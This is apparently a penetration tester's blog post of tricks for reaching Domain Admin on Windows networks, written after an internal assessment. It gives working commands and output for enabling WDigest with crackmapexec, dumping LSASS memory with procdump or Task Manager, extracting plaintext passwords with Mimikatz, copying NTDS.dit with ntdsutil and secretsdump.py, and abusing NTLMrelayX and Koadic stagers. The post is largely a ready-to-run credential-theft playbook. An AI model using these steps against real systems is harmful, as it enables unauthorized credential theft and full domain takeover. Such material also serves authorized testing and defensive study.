Helpful Tricks I Use to Get Domain Admin
So I was recently on an internal assessment (Thanks Hexcartel) and got to do some cool tricks I felt like sharing. Behold some tricks:
Dumping Lsass on Windows 10 😋
Quick and Easy
So, we all know you can’t just blast Crackmapexec and attach a C2 stager and get shells raining like you could in an unpatched Windows 7 network. See my post on “How I use Koadic on Internals” for that; No, on Windows 10 we have to be a little more sophisticated. So, let’s say you’ve gotten local admin creds to a system and there’s another Domain Admin that uses the same system but you can’t seem to find a way to get their creds. Well, since you have local admin to that box you can use Crackmapexec
to enable wdigest on that system so that next time the user auths’ to that system their creds will get stored in memory and you’ll be able to dump them.
In dumping their creds you actually have a few ways of doing it. If you want to do this easily you can simply RDP into the host after hours, open up task-manager, right mouse-click on lsass.exe on the details
tab, and select create dump file
. That’ll create a dump file of the lsass.exe process which you can then use Mimikatz against the dump file on your local attacking machine to get some plain-text creds; done.
Procdump
The other way is to use Procdump [Thanks N00py] to create the dump file. This is a great tool that will go undetected being that it is a Microsoft SysInternals tool. Every time I do this process I use this ARTICLE which walks through the process of dumping lsass with Procdump and dumping the creds locally with Mimikatz. It’s basically a TLDR of this tip. Using procdump instead of RDPing will allow for more creativity in creating the dump file you need as you can now use the command line in this process.
Getting The Dump Back 👈
So a great way to get the file back off the Windows 10 system is to use smbclient
. I often completely forget about smbclient when working on internals. I guess it gets overshadowed by the sexiness of Crackmapexec but it’s good for downloading files really quickly. Another way is to use SCP since Windows 10 now comes with SSH tools. Usually with these two methods you should be good on getting the file back to your attacking machine. If those won’t work Bitsadmin? Powershell…time to Google…
Once you get the file locally you’ll wanna get it to a local Windows system that has Mimikatz on it (Comment below if you can do this on Linux). Once you have everything ready follow the steps here or below.
So here’s the TLDR steps to do all this:
Steps 👟
- Enable Wdigest:
crackmapexec smb TARGETHOST -M wdigest -o ACTION=enable
- Wait a while for the target user to auth to their system
- Use smbclient or Crackmapexec or whatever to upload Procdump and dump lsass with it:
C:\users\ANOTHER-USER\desktop\procdump.exe -accepteula -ma lsass.exe lsass.dmp
OR… 4. After hours, RDP in to the target system ➡ Open Task-manager and go to Details tab ➡ Right mouse-click and dump lsass.exe
- Download the dump file to your attacking machine
- Use Mimikatz locally and dump the file using the following commands:
mimikatz $ sekurlsa::minidump YOUR_DUMP_FILE.dmp
Switch to minidump
mimikatz $ sekurlsa::logonPasswords
- LOOK CLOSELY to the output. IF YOU DO NOT LOOK CLOSELY YOU COULD MISS A DOMAIN ADMIN CRED!!! A good tip to make sure you’re not missing anything is to copy everything to your local Linux system and use
grep
to grep for passwords. I usually do:
cat mimikatz_output.txt | grep -i password -B2
This will show both the usernames and passwords that were dumped. If the user logged in during the time between you enabling wdigest and dumping lsass you should have the target user’s creds in plain-text!
Notes 📝
One thing to note about having Mimikatz on Windows 10: You’ll need to white-list a folder in your defender settings so it doesn’t keep getting popped by your own AV. I’m also sure there’s someone out there that would read all this and say…“Why don’t you just use/do XYZ to do all this instantly?” To you I say, “leave a comment below! Grace us with your knowledge and wisdom!”
Dumping NTDS Manually With A Native Windows Tool
Sometimes, due to anti-virus or restrictions against tools, you are unable to use Crackmapexec to dump the DC when that time comes. Sometimes you may have to dump it manually and a great way to do this is by using another native Windows tool by the name of NTDSUTIL. If you have the time you can read this ARTICLE on this:
C:\Users\Posh> ntds
'ntds' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\Posh> ntdsutil
ntdsutil: activate instance ntds
Active instance set to "ntds".
ntdsutil: ifm
ifm: c:\dumpty
ifm: create full c:\dumpty
Creating snapshot...
Snapshot set {159231da-b786-465e-a70f-aacd369d8487} generated successfully.
Snapshot {179aaee5-ddaf-4be6-b77e-7bd64771de86} mounted as C:\$SNAP_201910081913
_VOLUMEC$\
Snapshot {179aaee5-ddaf-4be6-b77e-7bd64771de86} is already mounted.
Initiating DEFRAGMENTATION mode...
Source Database: C:\$SNAP_201910081913_VOLUMEC$\Windows\NTDS\ntds.dit
Target Database: c:\dumpty\Active Directory\ntds.dit
Defragmentation Status (% complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Copying registry files...
Copying c:\dumpty\registry\SYSTEM
Copying c:\dumpty\registry\SECURITY
Snapshot {179aaee5-ddaf-4be6-b77e-7bd64771de86} unmounted.
IFM media created successfully in c:\dumpty
ifm: quit
ntdsutil: quit
// Download the NTDS.dit with SMBCLIENT
smb: \dumpty\Active Directory\> get ntds.dit
getting file \dumpty\Active Directory\ntds.dit of size 119554048 as ntds.dit (85282.7 KiloBytes/sec) (average 85282.7 KiloBytes/sec)
smb: \dumpty\registry\> get SECURITY
getting file \dumpty\registry\SECURITY of size 262144 as SECURITY (25599.8 KiloBytes/sec) (average 25600.0 KiloBytes/sec)
smb: \dumpty\registry\> get SYSTEM
getting file \dumpty\registry\SYSTEM of size 9961472 as SYSTEM (54044.4 KiloBytes/sec) (average 52547.4 KiloBytes/sec)
smb: \dumpty\Active Directory\> exit
Next you’ll use all three of these files when using secretsdump.py to dump the domain’s AD credentials locally on your attacking machine:
⋊> ~/C/CREDS python /usr/share/doc/python-impacket/examples/secretsdump.py -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Target system bootKey: 0x7u77e239a4dc745d0a21270c271a4509
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
...SNIP...
Notes 📝
Dumping this way locally may take a long time depending on what kind of setup you have. It won’t be lightning fast like crackmapexec is so don’t be shocked by this behavior.
Saving the Hashes you Relay 💼
Yea, it never dawned on me to look at the flags of NTLMrelayX until I looked at the flags of NTLMrelayX. Apprently there’s a ton of good features that it can do besides absentmindedly relaying NTLMv2s at targets.
NtlmrelayX Flags
⋊> /e/g/i/i/e/ntlmrelayx on master ◦ /usr/local/bin/ntlmrelayx.py -h 22:52:27
...snip...
Main options:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
-t TARGET, --target TARGET
Target to relay the credentials to, can be an IP,
hostname or URL like smb://server:445 If unspecified,
it will relay back to the client
-tf TARGETSFILE File that contains targets by hostname or full URL,
one per line
-w Watch the target file for changes and update target
list automatically (only valid with -tf)
-i, --interactive Launch an smbclient console instead of executing a
command after a successful relay. This console will
listen locally on a tcp port and can be reached with
for example netcat.
-ip INTERFACE_IP, --interface-ip INTERFACE_IP
IP address of interface to bind SMB and HTTP servers
--no-smb-server Disables the SMB server
--no-http-server Disables the HTTP server
--smb-port SMB_PORT Port to listen on smb server
--http-port HTTP_PORT
Port to listen on http server
-ra, --random Randomize target selection (HTTP server only)
-r SMBSERVER Redirect HTTP requests to a file:// path on SMBSERVER
-l LOOTDIR, --lootdir LOOTDIR
Loot directory in which gathered loot such as SAM
dumps will be stored (default: current directory).
-of OUTPUT_FILE, --output-file OUTPUT_FILE
base output filename for encrypted hashes. Suffixes
will be added for ntlm and ntlmv2
-codec CODEC Sets encoding used (codec) from the target's output
(default "ascii"). If errors are detected, run
chcp.com at the target, map the result with
https://docs.python.org/2.4/lib/standard-
encodings.html and then execute ntlmrelayx.py again
with -codec and the corresponding codec
-smb2support SMB2 Support (experimental!)
-socks Launch a SOCKS proxy for the connection relayed
-wh WPAD_HOST, --wpad-host WPAD_HOST
Enable serving a WPAD file for Proxy Authentication
attack, setting the proxy host to the one supplied.
-wa WPAD_AUTH_NUM, --wpad-auth-num WPAD_AUTH_NUM
Prompt for authentication N times for clients without
MS16-077 installed before serving a WPAD file.
-6, --ipv6 Listen on both IPv6 and IPv4
--remove-mic Remove MIC (exploit CVE-2019-1040)
--serve-image SERVE_IMAGE
local path of the image that will we returned to
clients
SMB client options:
-e FILE File to execute on the target system. If not
specified, hashes will be dumped (secretsdump.py must
be in the same directory)
-c COMMAND Command to execute on target system. If not specified,
hashes will be dumped (secretsdump.py must be in the
same directory).
--enum-local-admins If relayed user is not admin, attempt SAMR lookup to
see who is (only works pre Win 10 Anniversary)
...snip...
Yea so, looking at the flags, you can use -of
to specify an output file location where NTLMrelayX will save your relayed hashes! That way if you have issues relaying commands or your target has some sort of antivirus blocking your attempts you still have a chance to crack the hashes later.
Another interesting flag is the –enum-local-admins
flag. NTLMrelayX will do enumeration to try to figure out who the local admin is if the hashes you capture are low privileged! Sometimes it will fail and sometimes it won’t but it’s better to have than not, that’s for sure!
The last flag I noticed recently was the -i
flag which will open up an smbclient session upon successful relay. I haven’t played with this yet but it sounds useful. Sometimes when -c
commands aren’t working this would be a useful alternative to start uploading or downloading some files. Sometimes admins leave big juicy password.xlsx files on their desktops that contain DA creds. This flag would be great!
Using Koadic and Bloodhound on Windows Servers 💣
More often than not if you get access to a Windows Server 2008-2012 box they usually lack strong Anti-virus provisions in place. They don’t come with Windows Defender like a normal Windows 10 box would or anything like that so most of the time you can use a mshta stager in Koadic to quickly dump memory with the Mimikatz module or use the enum_domain_info module to quickly develop a strong foundation of information.
Similarly, these servers may be a good place to set up shop for a while and start doing some further enumeration. These servers will similarly be more accepting of things like BloodHound ingestors and maybe, dare I say, meterpreter payloads. You could also use these for PowerupSQL sessions if you’re hunting for sensitive information such as card holder data or patient health information.
SMBCLIENT For File Transfers 💽
It can be a real pain getting files off a Windows machine back on to your local attacking machine and having used crackmapexec for hours getting RCE everywhere it’s easy to forget about ol’ smbclient. But smbclient can be a great companion when downloading and uploading files quickly. Also, knowing how to recursively download and upload helps too. So the tip, type these words (flags) in next time you use smbclient to enable recursive interactivity. These commands toggle so type them in again if you need to disable them as well:
* Recurse # flag to toggle on recursion
* Prompt # flag to toggle off prompts
* mput/mget # Command used to get and put multiple files
_______________
< Ju$t d0 XYZ~! >
---------------
\ ____________
\ |__________|
/ /\
/ / \
/___________/___/|
| | |
| ==\ /== | |
| O O | \ \ |
| < | \ \|
/| | \ \
/ | \_____/ | / /
/ /| | / /|
/||\| | /||\/
-------------|
| | | |
<__/ \__>